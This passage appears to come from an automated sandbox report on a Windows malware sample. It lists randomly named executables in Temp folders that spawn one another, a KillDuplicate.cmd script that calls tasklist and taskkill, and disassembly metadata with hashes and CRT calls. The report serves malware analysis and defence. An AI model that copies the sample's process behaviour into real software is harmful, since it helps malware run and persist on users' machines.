                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: taskkill.exe PID: 5508 Parent PID: 4044

                                        General

                                        Start time:22:27:48
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\taskkill.exe
                                        Wow64 process (32bit):false
                                        Commandline:TaskKill /pid 3184 /t /f
                                        Imagebase:0x7ff6ac030000
                                        File size:94720 bytes
                                        MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 5mgcqk6jl.exe PID: 7004 Parent PID: 6596

                                        General

                                        Start time:22:27:49
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
                                        Imagebase:0x400000
                                        File size:238319 bytes
                                        MD5 hash:EC0FC802166AE83C519C5AEA89D65A53
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 5mgcqk6jl.exe PID: 5456 Parent PID: 3424

                                        General

                                        Start time:22:27:49
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
                                        Imagebase:0x400000
                                        File size:238319 bytes
                                        MD5 hash:EC0FC802166AE83C519C5AEA89D65A53
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 1sb1iwyem7.exe PID: 4624 Parent PID: 2740

                                        General

                                        Start time:22:27:50
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe'
                                        Imagebase:0x400000
                                        File size:257266 bytes
                                        MD5 hash:8AB82DE9E761FA26308DAC69D6B855A6
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 5mgcqk6jl.exe PID: 4492 Parent PID: 7004

                                        General

                                        Start time:22:27:51
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
                                        Imagebase:0x400000
                                        File size:238319 bytes
                                        MD5 hash:EC0FC802166AE83C519C5AEA89D65A53
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 5164 Parent PID: 4624

                                        General

                                        Start time:22:27:52
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
                                        Imagebase:0x7ff622070000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 5mgcqk6jl.exe PID: 5008 Parent PID: 5456

                                        General

                                        Start time:22:27:52
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
                                        Imagebase:0x400000
                                        File size:238319 bytes
                                        MD5 hash:EC0FC802166AE83C519C5AEA89D65A53
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 5048 Parent PID: 5164

                                        General

                                        Start time:22:27:52
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 5560 Parent PID: 5164

                                        General

                                        Start time:22:27:53
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
                                        Imagebase:0x7ff622070000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: tasklist.exe PID: 6932 Parent PID: 5560

                                        General

                                        Start time:22:27:53
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\tasklist.exe
                                        Wow64 process (32bit):false
                                        Commandline:TaskList /fo CSV /nh
                                        Imagebase:0x7ff728640000
                                        File size:100352 bytes
                                        MD5 hash:B12E0F9C42075B4B7AD01D0B6A48485D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 5mgcqk6jl.exe PID: 7060 Parent PID: 5008

                                        General

                                        Start time:22:27:54
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
                                        Imagebase:0x400000
                                        File size:238319 bytes
                                        MD5 hash:EC0FC802166AE83C519C5AEA89D65A53
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 5mgcqk6jl.exe PID: 1172 Parent PID: 4492

                                        General

                                        Start time:22:27:54
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
                                        Imagebase:0x400000
                                        File size:238319 bytes
                                        MD5 hash:EC0FC802166AE83C519C5AEA89D65A53
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 5mgcqk6jl.exe PID: 5480 Parent PID: 1172

                                        General

                                        Start time:22:27:59
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
                                        Imagebase:0x400000
                                        File size:238319 bytes
                                        MD5 hash:EC0FC802166AE83C519C5AEA89D65A53
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 5mgcqk6jl.exe PID: 5364 Parent PID: 7060

                                        General

                                        Start time:22:28:00
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
                                        Imagebase:0x400000
                                        File size:238319 bytes
                                        MD5 hash:EC0FC802166AE83C519C5AEA89D65A53
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: taskkill.exe PID: 5916 Parent PID: 5164

                                        General

                                        Start time:22:28:01
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\taskkill.exe
                                        Wow64 process (32bit):false
                                        Commandline:TaskKill /pid 4624 /t /f
                                        Imagebase:0x7ff6ac030000
                                        File size:94720 bytes
                                        MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: rnyuf.exe PID: 5388 Parent PID: 968

                                        General

                                        Start time:22:28:01
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        Imagebase:0xf00000
                                        File size:203264 bytes
                                        MD5 hash:F8899BB72B91E110CD5D6DA17861369C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 5mgcqk6jl.exe PID: 6996 Parent PID: 3424

                                        General

                                        Start time:22:28:02
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
                                        Imagebase:0x400000
                                        File size:238319 bytes
                                        MD5 hash:EC0FC802166AE83C519C5AEA89D65A53
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 5mgcqk6jl.exe PID: 816 Parent PID: 5480

                                        General

                                        Start time:22:28:02
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
                                        Imagebase:0x400000
                                        File size:238319 bytes
                                        MD5 hash:EC0FC802166AE83C519C5AEA89D65A53
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Disassembly

                                        Code Analysis

                                        Reset < >

                                          Analysis Process: mvoElayshk.exe PID: 3220 Parent PID: 5232 mvoElayshk.exeCOMMON

                                          Executed Functions

                                          Function 00007FFA35E200A0, Relevance: .6, Instructions: 602COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659591310.00007FFA35E20000.00000040.00000001.sdmp, Offset: 00007FFA35E20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea0be04fd73ece2f6b5bf272c500d588bb6769ea81cf49ef53c17263d63f354f
                                          • Instruction ID: 45c8d2e07f539b5f8633d7e649e01eaf4e4087d1023faf510ee1c09262429f28
                                          • Opcode Fuzzy Hash: ea0be04fd73ece2f6b5bf272c500d588bb6769ea81cf49ef53c17263d63f354f
                                          • Instruction Fuzzy Hash: 8C51C17091868A8FDB45EB6CD852BE9BFF1FF5A300F1441BAD04DD7282DA286885C791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFA35E205C5, Relevance: .2, Instructions: 238COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659591310.00007FFA35E20000.00000040.00000001.sdmp, Offset: 00007FFA35E20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b4eec81254639fa4df118cbe31e2046c4b51cb15761c3fd60ce3931ba6c9fb7
                                          • Instruction ID: 4e6f52993eba0716c31852d378280b840968a1f11292990a36b857f5762d1a16
                                          • Opcode Fuzzy Hash: 0b4eec81254639fa4df118cbe31e2046c4b51cb15761c3fd60ce3931ba6c9fb7
                                          • Instruction Fuzzy Hash: 48711571A0CB4A4FD798EB1CD8555657BF1FF8A711B1481AAE48DC3296CE24EC428B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFA35E2089E, Relevance: .1, Instructions: 117COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659591310.00007FFA35E20000.00000040.00000001.sdmp, Offset: 00007FFA35E20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d16a4f7f747cd28858dc8739b81007d813b0d2847ed5cc5f6b5a81f975b61c47
                                          • Instruction ID: e296d15e7ad826bc46d631212bbab923c5fc6ceb557e5a3f12bbf3db63330edd
                                          • Opcode Fuzzy Hash: d16a4f7f747cd28858dc8739b81007d813b0d2847ed5cc5f6b5a81f975b61c47
                                          • Instruction Fuzzy Hash: 63416030A18A1B8FEBA9FF28D8956BA37D1FF86701F548539D40EC31D6CE25A845D780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFA35E208E6, Relevance: .1, Instructions: 101COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659591310.00007FFA35E20000.00000040.00000001.sdmp, Offset: 00007FFA35E20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 53601a257a7028e23e60804852ce9b05f1447ce1930fab9d9625168173f09487
                                          • Instruction ID: b675d7aedce673148af633a4aec7d3c8a7cc3f4b4171d3494459c4fbc04556a4
                                          • Opcode Fuzzy Hash: 53601a257a7028e23e60804852ce9b05f1447ce1930fab9d9625168173f09487
                                          • Instruction Fuzzy Hash: 75313C30914A1A8FEBA9FF28D8952FA72E1FF8A701F508539D40EC31D6CE35A841C780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFA35E208DA, Relevance: .1, Instructions: 99COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659591310.00007FFA35E20000.00000040.00000001.sdmp, Offset: 00007FFA35E20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 779534773b66dfe21af9f92b9afce5052f88f3ed44efc015f4c0b2d1e9e408f0
                                          • Instruction ID: 4b94754bba62115c9f12f230279db044d918e272558dcd8ee6fb328b7e591d9c
                                          • Opcode Fuzzy Hash: 779534773b66dfe21af9f92b9afce5052f88f3ed44efc015f4c0b2d1e9e408f0
                                          • Instruction Fuzzy Hash: 37314C30918A1B8FEBA8FF28D8952FA72E1FF86701F508539D41EC31D6CE25A8418780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFA35E20897, Relevance: .1, Instructions: 98COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659591310.00007FFA35E20000.00000040.00000001.sdmp, Offset: 00007FFA35E20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: db84889606dc5d989af8008033aec709eedf7497adf266661ba4d527054d3fc9
                                          • Instruction ID: 30ee21fc33fc949b8ed08afa324c0927efb4ea36a5a3726e8064d8ee41aca739
                                          • Opcode Fuzzy Hash: db84889606dc5d989af8008033aec709eedf7497adf266661ba4d527054d3fc9
                                          • Instruction Fuzzy Hash: 2F314C30918A1B8FEBA4EF28D8952FA72A1FF96701F508539D41EC31D6CE25A8418780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 002A0850, Relevance: 3.4, APIs: 2, Instructions: 441COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: af4a96a898083f9bfd20437f4976258b7fc4a9f5e55daac769e9132394ece615
                                          • Instruction ID: a64480bb6cddcd2d9e9aa097504dc8b6fa966fd1240c4b29448032d1e996fe85
                                          • Opcode Fuzzy Hash: af4a96a898083f9bfd20437f4976258b7fc4a9f5e55daac769e9132394ece615
                                          • Instruction Fuzzy Hash: 94F12873F112118FE714CFB8C9806AD77B1E74972CB258229DF15A7B88DB30AA51CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00295187, Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: 0
                                          • API String ID: 0-4108050209
                                          • Opcode ID: 4670ae882a88defea128ce72432218d7744bd3d80bb6086f4220bc34dd402b5b
                                          • Instruction ID: 71670272bcea51f2f16e5fe5e4bbec8096c7e0c5f00e85ab96d2a3e143c1baa3
                                          • Opcode Fuzzy Hash: 4670ae882a88defea128ce72432218d7744bd3d80bb6086f4220bc34dd402b5b
                                          • Instruction Fuzzy Hash: EC51DB32B34E765BDF3B9F3888657BC27529B02308F180059DE8A9B682D785DD788705
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00284800, Relevance: .7, Instructions: 695COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e824339cf09322fe57e75d7e819a7fd4e9e86187ca0ae2f04d07aff0c6a6c7f3
                                          • Instruction ID: a6b28d15206e9d3e2bf72b4d005cd0f69155f75ce520d10a554f41dbd884952e
                                          • Opcode Fuzzy Hash: e824339cf09322fe57e75d7e819a7fd4e9e86187ca0ae2f04d07aff0c6a6c7f3
                                          • Instruction Fuzzy Hash: 8E2253B3F515104FE70CCB6DDCA27EC72E3A7D821871E803DAA0AD3B49EA79D9158644
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002A4EFD, Relevance: .3, Instructions: 273COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 160bc33993587e932549b104d29b1490e0dcff6c9818025a9a0859e758aec275
                                          • Instruction ID: 586665cf4c0ac514309ab14e88d40dace5c701675873a125da5f2a3d800dec97
                                          • Opcode Fuzzy Hash: 160bc33993587e932549b104d29b1490e0dcff6c9818025a9a0859e758aec275
                                          • Instruction Fuzzy Hash: 46B12C33620A81DFD315CF2CC486B697BA1F345768F19C214E796CB6A4C779E9A2CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00291862, Relevance: .1, Instructions: 145COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b47ce34620d5c274003132e3a055ef53601b84cd6fff4fd9cef735a3bc7d4814
                                          • Instruction ID: 7dedc56a6c7f3bddec3559f77b068127e2118be5a2c6dafa9ceb03e1d7fd2492
                                          • Opcode Fuzzy Hash: b47ce34620d5c274003132e3a055ef53601b84cd6fff4fd9cef735a3bc7d4814
                                          • Instruction Fuzzy Hash: C5516CB3A212028FF719CF65D9917AC3BF1F748718F28882ADA01D7B54D2389D60CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002A3CA7, Relevance: .1, Instructions: 103COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c52332eb5f62d92da488fef0a1681552a807e1524f1c177c6e5d7433c34863c
                                          • Instruction ID: 6e0662c0e91695198ec1a1575b6ce213668159cb1d2e8d42ed844b3ef77620e9
                                          • Opcode Fuzzy Hash: 0c52332eb5f62d92da488fef0a1681552a807e1524f1c177c6e5d7433c34863c
                                          • Instruction Fuzzy Hash: E521B373F208344BB70CC57E8C5237876E1834C605745863AEDA6DA6C5E968DA27E2A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002A3B87, Relevance: .1, Instructions: 80COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b42bbac87ff87cdf7ee386ae3658bf8c98c8971b3855446eb46e09f9bc607cdf
                                          • Instruction ID: 89f6eeb85c4cc9da242f070ea9e138ab5eeacbc6c8522404c90d629273ef9071
                                          • Opcode Fuzzy Hash: b42bbac87ff87cdf7ee386ae3658bf8c98c8971b3855446eb46e09f9bc607cdf
                                          • Instruction Fuzzy Hash: BE119423F30C255B734C81B98C133B965D3E7D828470F433ADD26E6684E954DA23D290
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002A5EB0, Relevance: .1, Instructions: 76COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction ID: 32c4aca8765c013ef5b53e93c4b6764e46093b3531becb9568897d61cfdfc8af
                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction Fuzzy Hash: 741138B72218A24BD6168E2DDA746BF2355EAD7320B5C4224C642C7E48FE32E9F4D900
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0029E16C, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 0029E1A5
                                          • ___free_lconv_mon.LIBCMT ref: 0029E1B0
                                            • Part of subcall function 0029DD49: _free.LIBCMT ref: 0029DD66
                                            • Part of subcall function 0029DD49: _free.LIBCMT ref: 0029DD78
                                            • Part of subcall function 0029DD49: _free.LIBCMT ref: 0029DD8A
                                            • Part of subcall function 0029DD49: _free.LIBCMT ref: 0029DD9C
                                            • Part of subcall function 0029DD49: _free.LIBCMT ref: 0029DDAE
                                            • Part of subcall function 0029DD49: _free.LIBCMT ref: 0029DDC0
                                            • Part of subcall function 0029DD49: _free.LIBCMT ref: 0029DDD2
                                            • Part of subcall function 0029DD49: _free.LIBCMT ref: 0029DDE4
                                            • Part of subcall function 0029DD49: _free.LIBCMT ref: 0029DDF6
                                            • Part of subcall function 0029DD49: _free.LIBCMT ref: 0029DE08
                                            • Part of subcall function 0029DD49: _free.LIBCMT ref: 0029DE1A
                                            • Part of subcall function 0029DD49: _free.LIBCMT ref: 0029DE2C
                                            • Part of subcall function 0029DD49: _free.LIBCMT ref: 0029DE3E
                                          • _free.LIBCMT ref: 0029E1C7
                                          • _free.LIBCMT ref: 0029E1DC
                                          • _free.LIBCMT ref: 0029E1E7
                                          • _free.LIBCMT ref: 0029E209
                                          • _free.LIBCMT ref: 0029E21C
                                          • _free.LIBCMT ref: 0029E22A
                                          • _free.LIBCMT ref: 0029E235
                                          • _free.LIBCMT ref: 0029E26D
                                          • _free.LIBCMT ref: 0029E274
                                          • _free.LIBCMT ref: 0029E291
                                          • _free.LIBCMT ref: 0029E2A9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$___free_lconv_mon
                                          • String ID:
                                          • API String ID: 3658870901-0
                                          • Opcode ID: 6e6829f945fb38eee2558471d67fcd828d25534c293ea5dfe52bf9b8956759b2
                                          • Instruction ID: 1d5e1059e9db2b9da4dfae2701c309ab1350f32836dcf2398968d29528106bbd
                                          • Opcode Fuzzy Hash: 6e6829f945fb38eee2558471d67fcd828d25534c293ea5dfe52bf9b8956759b2
                                          • Instruction Fuzzy Hash: D9315C33A282429BEF25EF75E945B6D33A5E740310F05A025BF9997241EF78EDA0DB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0029841A, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 1fcfb7d0ffea5263bcad58445cfe15267b6c93876006fca3dd3a00027fdf9090
                                          • Instruction ID: 14479853496c3a212b2d8ed4f104c4650b984ab1cdb0f3edb775efbafa882813
                                          • Opcode Fuzzy Hash: 1fcfb7d0ffea5263bcad58445cfe15267b6c93876006fca3dd3a00027fdf9090
                                          • Instruction Fuzzy Hash: D921ED7BA28140AFD744EFB4C8419DC3BB0F748748B049166FB1897A09EB30DA54DF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00292080, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 002920B7
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 002920BF
                                          • _ValidateLocalCookies.LIBCMT ref: 00292148
                                          • _ValidateLocalCookies.LIBCMT ref: 002921C8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CookiesLocalValidate$___except_validate_context_record
                                          • String ID: csm$csm$h@A
                                          • API String ID: 2101322661-2734375912
                                          • Opcode ID: 84bdc55b714527e5fdc60b4ffe54262539e59ca7ce365fd71d42ebc4de200af4
                                          • Instruction ID: bd7277ff3b1baedb5b3813a620691e18b5a5e60dac1116519bfe3c2ace5522e2
                                          • Opcode Fuzzy Hash: 84bdc55b714527e5fdc60b4ffe54262539e59ca7ce365fd71d42ebc4de200af4
                                          • Instruction Fuzzy Hash: C451983AA20241EFEF149F68D840BAC3BA1E754B18F148115EF056779ADB34DE6ACB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0029DEE8, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 17f53bcb001aa0cf27f4b28cdacd85efe4fe4569033449001c41b86b803b0e8a
                                          • Instruction ID: 4a81278d8ba158fdd8f56335b86d8237bfa8c2fa510fcdb3a1e92265a1da1784
